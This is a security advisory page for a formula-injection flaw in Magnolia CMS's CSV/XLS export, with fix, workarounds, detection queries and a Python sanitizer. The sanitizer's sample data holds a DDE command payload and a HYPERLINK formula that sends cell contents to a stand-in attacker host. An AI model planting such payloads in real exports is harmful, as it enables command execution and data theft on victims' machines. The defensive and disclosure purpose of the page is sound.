CVE-2021-46363

7.8 HIGH

📋 TL;DR

Magnolia's Export function writes stored field values into CSV/XLS files without neutralizing cells that begin with formula characters (=, +, -, @). An attacker who can get such a value stored in the CMS has it carried verbatim into any later export. When the recipient opens that file in Microsoft Excel, the cell is evaluated as a formula rather than shown as text: a DDE-style expression can launch a local command once the user accepts Excel's external-content prompts, and a HYPERLINK or WEBSERVICE formula can leak neighbouring cell contents to an attacker-controlled URL. It affects Magnolia CMS v6.2.3 and earlier versions.

💻 Affected Systems

Products:
  • Magnolia CMS
Versions: v6.2.3 and below
Operating Systems: Any OS running Magnolia CMS
Default Config Vulnerable: ⚠️ Yes
Notes: The defect is in the Export function (cell values are not escaped). Exploitation requires a victim to open the exported file in Microsoft Excel (or another spreadsheet application that evaluates formulas) and, for command-launching payloads, to accept the security prompts it shows.

📦 What is this software?

Magnolia CMS is a Java-based content management system, available as an open-source Community Edition and a commercial edition, normally deployed as a web application on a servlet container such as Tomcat. Its AdminCentral UI includes content import and export functions, which is where this issue lives.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Code execution on the victim's workstation: a DDE-style formula in the exported file launches a local command when the user opens it in Excel and clicks through the external-content prompts. Because the people running exports are usually administrators or content editors, this can lead to full compromise of that workstation and the credentials held on it.

🟠

Likely Case

Data theft (HYPERLINK or WEBSERVICE formulas sending other cells to an attacker-controlled host), malware installation, or silent manipulation of the exported data when users open exported files.

🟢

If Mitigated

Limited impact if exported files are opened only in a text editor, or if Excel's DDE server launch and lookup are disabled and users decline external-content prompts.

🌐 Internet-Facing: MEDIUM - The attacker needs an account or input channel that lets them store a crafted cell value in the CMS; a privileged user must then export the data and open the file.
🏢 Internal Only: MEDIUM - Insiders or compromised editor accounts can plant values that target the administrators who run exports; user interaction is still required.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires the ability to place a crafted value into content that will later be exported, plus user interaction: the victim must open the exported file in Excel and, for DDE payloads, accept its warning prompts. No authentication bypass is involved.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Magnolia CMS 6.2.4

Vendor Advisory: https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.4.html#_security_advisory

Restart Required: Yes

Instructions:

1. Back up your Magnolia instance.
2. Upgrade to Magnolia CMS 6.2.4 or later.
3. Restart the application server.
4. Verify the export function no longer allows formula injection.

🔧 Temporary Workarounds

Disable Export Function

Platform: all

Temporarily disable the export functionality in Magnolia CMS, or restrict it to a small set of accounts, to prevent formula injection attacks.

Configure Magnolia's role permissions to restrict or disable the export features in the admin interface.

Excel Security Configuration

Platform: windows

Configure Microsoft Excel so that DDE expressions cannot start other programs, and keep Protected View enabled for files downloaded from the web.

In Excel, open File > Options > Trust Center > Trust Center Settings > External Content and clear "Enable Dynamic Data Exchange Server Launch" and "Enable Dynamic Data Exchange Server Lookup". These correspond to the DisableDDEServerLaunch and DisableDDEServerLookup registry values described in Microsoft advisory ADV170021 and can be pushed by Group Policy. Note that this blocks command launching but not HYPERLINK-style data exfiltration, so the "do not open exports in Excel" guidance still applies.

🧯 If You Can't Patch

  • Restrict access to export functionality to trusted users only, and restrict who can write to the fields that feed exports
  • Educate users to never open exported CSV/XLS files in Microsoft Excel; inspect them in a text editor or import them into another tool with formula evaluation disabled
  • If you generate exports from your own code on top of Magnolia, neutralize any cell that begins with =, +, -, @, tab or carriage return (for example by prefixing a single quote) before writing it

🔍 How to Verify

Check if Vulnerable:

Check the Magnolia CMS version; if running v6.2.3 or earlier, the export function is vulnerable regardless of configuration.

Check Version:

Check the version shown in the AdminCentral "About" app, the version Magnolia prints in the application log at startup, or the magnolia-core jar name under WEB-INF/lib of the deployed webapp.

Verify Fix Applied:

After upgrading to v6.2.4 or later, store a test value such as =1+1 in an exportable field, run the export, and open the resulting file in a text editor (not Excel): the cell should be neutralized (for example quoted or prefixed with an apostrophe) rather than written verbatim.

📡 Detection & Monitoring

Log Indicators:

  • Export activity from accounts or at times that do not match their normal role
  • Multiple export requests from a single user in a short period
  • Stored field values that begin with =, +, -, or @ followed by a function name, "cmd", or a pipe character (the planted payload, visible before anyone exports)

Network Indicators:

  • Unexpected export file downloads
  • CSV/XLS files in transit whose cells begin with =, +, -, or @ and contain formula syntax
  • Outbound HTTP requests from a workstation to an unfamiliar host immediately after an exported file is opened (HYPERLINK/WEBSERVICE exfiltration)

SIEM Query:

Export-activity query (field names are placeholders; map them to what your log shipper emits for Magnolia's access or audit log):

source="magnolia" AND (event="export" OR uri="*/export*" OR file_type IN ("csv", "xls", "xlsx")) AND NOT user IN ("<accounts that routinely run exports>")

Content query, which catches the planted payload before anyone exports it (assumes a save/audit event that carries the stored field value; a leading "-" is left out because of numeric noise):

source="magnolia" AND event="content_save" AND (value="=*" OR value="+*" OR value="@*")
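The content check above and the "Verify Fix Applied" step both come down to the same per-cell test, so here it is as runnable code. This is an added example, not Magnolia code or a Magnolia API: it scans a CSV export for cells that Excel would evaluate, and shows the neutralization a hardened exporter applies. The trigger-character list follows the OWASP CSV injection guidance; the sample export is constructed for the example, and the payload strings are the generic, publicly documented CSV-injection forms, not something taken from this CVE.

```python
"""Detect and neutralize spreadsheet formula injection in a CSV export.

Added example, not part of Magnolia. Works on plain CSV with the standard
library; for .xlsx exports read cells with openpyxl and apply the same
per-cell test.
"""
from __future__ import annotations

import csv
import io

# Leading characters that make Excel treat a cell as a formula or DDE
# expression instead of text (OWASP CSV injection list).
TRIGGER_CHARS = ("=", "+", "-", "@", "\t", "\r")


def _is_plain_number(value: str) -> bool:
    """'-5' or '+3.25' is a number, not a formula; do not flag or rewrite it."""
    try:
        float(value.strip())
        return True
    except ValueError:
        return False


def is_formula_cell(value: str) -> bool:
    """True if Excel would evaluate this cell rather than display it as text."""
    return value[:1] in TRIGGER_CHARS and not _is_plain_number(value)


def neutralize_cell(value: str) -> str:
    """Prefix a single quote so the cell is stored as text.

    Embedded tabs and carriage returns are replaced with spaces because
    some importers split a cell on them, which would expose a fresh
    leading character to evaluation.
    """
    if not is_formula_cell(value):
        return value
    cleaned = value.replace("\t", " ").replace("\r", " ")
    return "'" + cleaned


def scan_csv(text: str) -> list[tuple[int, int, str]]:
    """Return (row, column, value) for every cell that would be evaluated.

    Rows and columns are 1-based; the header line counts as row 1.
    """
    findings: list[tuple[int, int, str]] = []
    for r, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for c, cell in enumerate(row, start=1):
            if is_formula_cell(cell):
                findings.append((r, c, cell))
    return findings


def sanitize_csv(text: str) -> str:
    """Rewrite a CSV so no cell starts with a formula trigger.

    Every field is quoted on output, which is what a hardened exporter
    should do anyway so that commas and newlines in values cannot
    restructure the file.
    """
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in csv.reader(io.StringIO(text)):
        writer.writerow([neutralize_cell(cell) for cell in row])
    return out.getvalue()


# Constructed sample of what an unsanitized export looks like. Rows 3-5
# carry values an attacker stored in the CMS earlier; row 2 shows a
# legitimate negative number that must NOT be flagged.
SAMPLE_EXPORT = (
    "id,name,balance\n"
    "1,Alice,-5\n"
    "2,\"=cmd|' /C calc'!A0\",10\n"
    '3,"=HYPERLINK(""http://attacker.example/?""&A1,""click"")",0\n'
    "4,@SUM(1+1),3\n"
)

if __name__ == "__main__":
    for row, col, value in scan_csv(SAMPLE_EXPORT):
        print(f"row {row} col {col}: {value!r}")
    print(sanitize_csv(SAMPLE_EXPORT))
```

Running the block lists three findings (rows 3, 4 and 5, column 2) and prints the sanitized file, which scans clean. Values such as phone numbers written with a leading "+" will also be neutralized; that is harmless, since the apostrophe only forces text interpretation, but be aware that some importers display it in the cell.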

🔗 References

  • Magnolia CMS 6.2.4 release notes, security advisory: https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.4.html#_security_advisory
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2021-46363